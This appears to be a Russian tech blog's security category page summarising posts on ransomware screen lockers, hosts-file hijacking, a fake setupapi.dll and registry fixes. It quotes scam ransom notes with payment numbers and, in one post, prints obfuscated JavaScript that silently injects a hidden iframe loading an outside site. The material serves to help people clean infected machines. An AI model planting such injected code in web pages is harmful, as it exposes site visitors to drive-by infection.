Безопасность
Подписаться на эту рубрику по RSS
Аппетиты вирусов-вымогателей растут
На страницах блога я уже не раз писал о вирусах-вымогателях - началось всё с вируса Internet Security два года назад. Потому не буду переливать из пустого в порожнее и в очередной раз подробно и в деталях рассказывать о лечении.
Однако аппетиты у них растут, конечно не у самих вирусов, а их владельцев. Очередной такой любитель быстрой наживы требует 1000 рублей за код разблокировки... действительно, чего мелочиться то.
Внимание! Вопрос к тем, кто всё ещё отправляет деньги - действительно код приходит? Впрочем, те кто читает этот пост, вряд-ли дадут ответ...
Компьютер заблокирован! Windows 7
В предыдущей статье я рассказал как избавиться от нового вируса-вымогателя, блокирующего компьютер на Windows XP. Буквально сегодня принесли ноутбук с таким-же вирусом, правда у этого аппетиты скромнее - просит не 500, а 400 рублей так называемых "штрафов".
Собственно, под Windows 7 действие вируса немного проще. По всей видимости в семерке переписать файл в системной папке C:\Windows\system32 ему не под силу. В результате алгоритм лечения немного изменился.
Компьютер заблокирован! Новый вариант вымогателей
Ваш компьютер заблокирован за посмотр, копирование и тиражирование видеоматериалов содержащих элементы педофилии и насилия над детьми. Для снятия блокировки Вам необходимо оплатить штраф в размере 500 рублей на номер Билайн 8-909-151-56-52. В случае оплаты суммы равной штрафу либо превышающей ее на фискальном чеке терминала буде напечатан код разблокировки. Его нужно ввести в поле в нижней чати окна и нажать кнопку "Разблокировать". После снятия блокироки Вы должны удалить все материалы содержащие элементы насилия и педофилии. Если в течении 12 часов штраф не будет оплачен, все данные на Вашем компьютере будут безвозвратно удалены, а дело будет передано в суд для разбирательства по статье 242 ч.1 УК РФ.
Перезагрузка или выключение компьютера приведет к незамедлительному удалению ВСЕХ данных, включая код операционной системы и BIOS, с невозможностью дальнейшего восстановления.
Буквально за пару дней поступило несколько пациентов с подобыми симптомами. С Первого взгляда ничего особенного - обычный блокиратор, уже не раз писал о них в разделе вирусология. Однако этот тип немного отличается от описанных ранее, например Internet Security и отличие это поганенькое.
Данный вымогатель заменяет собой системый файл userinit.exe, находящийся в каталоге C:\WINDOWS\system32\, чего не замечалось за его предшественниками.
Как найти вирус на сайте
Вирусный код с сайта:
<script language=JavaScript>
jhtm='%3Ciframe%20src%3D%22http%3A//inanalitics.in/inc/top/iframe.php%22
%20width%3D1%20height%3D1%20style%3D%22visibility%3A%20hidden%22%3E%3C
/iframe%3E';crypo=unescape(jhtm);document.write(crypo);
</script>
Не так давно меня попросили разобраться с одним сайтом. Яндекс пометил его как распростаняющий вирусы, о чем выдавал информацию сразу после ссылки на сайт, да и антивирусы, способные фильтровать интернет-трафик, также ругаются на такие сайты.
Действительно, вирусы, написанные для сайтов, набирают популярность. Но надо понимать, что большинстве случаев, сам вирус находится на компьютере, имеющем ftp доступ к сайту. Принцип действия примерно следующий - вирус незаметно для пользователя крадёт пароли от ftp, подключается и вставляет в скрипты сайта паразитный код.
Не открываются сайты антивирусов
Запомнился мне один случай с вирусом-трояном, проявившим своё присутствие довольно оригинальным способом. При попытке открыть сайт антивируса, будь то DrWeb, Kaspersky или NOD32 (да вообще любой известный), браузер сообщал, что такой ресурс не существует. Соотвественно блокировались и любые обновления установленного антивирусного пакета.
Ваш компьютер заблокирован за рассылку спама
На днях столкнулся с очередным вымогателем, по традиции маскирующийся под систему безопасности Internet Security (ну хоть бы название какое иное выдумали). На этот раз назвать данное творение вирусом язык не поворачивается, хотя обычному пользователю нервов потратить может массу. Особенно актуально для любителей социальной сети ВКОНТАКТЕ. Каюсь, сам по началу не мог понять в чем дело.
Суть действий - при попытке просмотра любого сайта, вместо ожидаемой странички вылазит картинка следующего содержания:
Internet Security Запрашиваемый URL адрес не может быть предоставлен. Ваш компьютер заблокирован за рассылку спама. Вы можете разблокировать свой компьютер, для этого перейдите на сайт ВКонтакте и активируйте свою анкету. После чего Вы сможе пользоваться всей сетью.
Итак, как таковым вирусом данный вымогатель не является. Он изменяет файл:
C:\Windows\System32\drivers\etc\hosts
читать полностью →Пропал звук в Интернет. Flash без звука или setupapi.dll
Сегодня попросили решить такую проблему - при просмотре любого видео в Интернет, например с YouTube, изображение идет без сопровождения звука. Причем на самом компьютере звук есть - музыка, фильмы, игры идут без проблем со звуком. Проблема не решается не переустановкой flash плейера, не сменой браузера. Более того IE вообще отказывается запускаться.
Виновником такого поведения оказался вирус. Куда копать подсказал браузер Opera, выдав сообщение об ошибке при обращении к библиотеке setupapi.dll. Как известно, в каждой Windows системе есть системная библиотека C:/Windows/system32/setupapi.dll. Под неё и маскируется вирус, копируя себя в папки всех установленых браузеров с таким именем.
Чтобы восстановить нормальное воспроизведение видео со звуком в Internet достаточно удалить с компьютера все файлы setupapi.dll, кроме C:/Windows/system32/setupapi.dll. Найти их можно поиском, не забыв включить в него скрытые и системные файлы.
После всё же рекомендую проверить компьютер свежим антивирусом. Обычно единственным вирусом дело не обходится. Flash player кстати можно не переставлять.
Вместо рабочего стола Windows загружается проводник!
В продолжение серии статей о вирусах и последствиях борьбы с ними, хочу рассказать что делать, если вместо рабочего стола Windows вы видите пустой экран или загружается проводник. Рассмотрим случай, когда после загрузки видим пустой рабочий стол, без меню «Пуск», значков и вообще всего нажитого непосильным трудом – одни обои, если они были.
Синий экран смерти (BSOD) и причём тут DrWeb?
Сегодняшний день начался крайне неудачно - на нескольких рабочих станциях во время загрузки появился синий экран смерти (BSOD). Перезагрузка проблему не решала. Видимо мне повезло ощутить на себе действие пословицы про тяжелый день понедельник.
Диспетчер задач отключен администратором. Win32.Sector.21
В своих заметках, я уже не раз рассказывал о том, как исправить блокировки компьютера (диспетчер задач, редактор реестра) посредством утилиты AVZ. Сегодня хочу немного приоткрыть тайну, как это сделать простым редактированием реестра.
Для начала требуется загрузиться с LiveCD, флешки с WinPE, подсоединить винчестер к другому компьютеру - в общем главное, не грузиться с него самого, т.к. смысла в этом никакого. Далее запускаете редактор реестра, подключаем к нему необходимую нам ветку HKEY_CURRENT_USER. Данной ветке реестра соответствует файл NTUSER.DAT в соответствующем каталоге пользователя.
Избавляемся от блокировки диспетчера задач
Изменяем значение параметра DisableTaskMgr в разделе [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] со значения 1 на 0, либо вообще удаляем данный параметр.
В паре с этим параметром в 99% случаях там же вы найдете параметр DisableRegistryTools, отключающий редактор реестра. Соответственно меняете его значение на 0 или удаляете.
читать полностью →Новая волна блокираторов. Вирус PC Defender
Вирус-вымогатель PC Defender. Похоже тема блокираторов ещё не закончилась. Сегодня принесли сразу 2 ноутбука с одинаковой заразой - на этот раз блокиратор маскируется под антивирус с названием PC Defender. В сети я не раз сталкивался с сайтами, где станички были оформлены в подобном стиле и пользователю показывалась картинка в точности воспроизводящая действия антивируса. Естественно показывалось множество "зараженых" файлов.
Новый блокиратор Online Antivirus
Online Antivirus
Внимание! Онлайн проверка показала, что в Вашей системе обнаружен вредоносный вирус, который постепенно заражает все файлы на Вашем компьютере. Вирус временно заблокирован, но его алгоритм шифрования постоянно меняется и остановить его на данный момент не имея этой программы не представляется возможным. Для того, чтобы удалить вредоносный вирус, необходимо узнать каков на данный момент у вируса алгоритм шифрования, для этого необходимо отправить смс на короткий номер 5121 с текстом 6625025. После того как Вы отправите смс, вам моментально будет выслан ключ, отключающий вирус. Введите этот ключ, и программа полностью удалит вирус с Вашего компьютера.
Алгоритм шифрования вируса сменится через 218 секунд.
(по истечению этого времени настоятельно рекомендуется удалить его)
Введите полученный вами ключ в это поле:
Удалить
Собственно вот и новый вымогатель нарисовался Online Antivirus - интересно долго ещё терпеть подобное придется? У людей прямо направление бизнеса наметилось. Не пора-ли эти лохотроны объявлять вне закона? Мы тут все последствия лечим, а надо корень зла убивать - платные SMS на короткие номера. Достали уже...
вирус Internet Security
Новый год принес нам новые вирусы. На смену eKav antivirus пришел новый вымогатель по имени Internet Security. Вот он красавец:
За последние 2 недели принесли уже четыры машины с вирусом, который просит отправить СМС, чтобы якобы активировать копию некого Internet Security. По всей видимости ситуация начинает принимать характер эпидемии. Да и двое из четверых пострадавших успели отправить SMS... Сразу говорю - ВИРУС ПО ПРЕЖНЕМУ ОСТАЕТСЯ В КОМПЬЮТЕРЕ!!!!!
Внимание! Internet Security обнаружил вредоносное ПО на вашем компьютере
Вы не зарегистрировали вашу копию Internet Security далее следует всякая чушь о лицензионном соглашении и ради чего всё задумывалось - отправка SMS. Мне встретились 2 варианта:
- СМС с кодом K204114200 на номер 7373
- СМС с кодом K207824300 на номер 4460
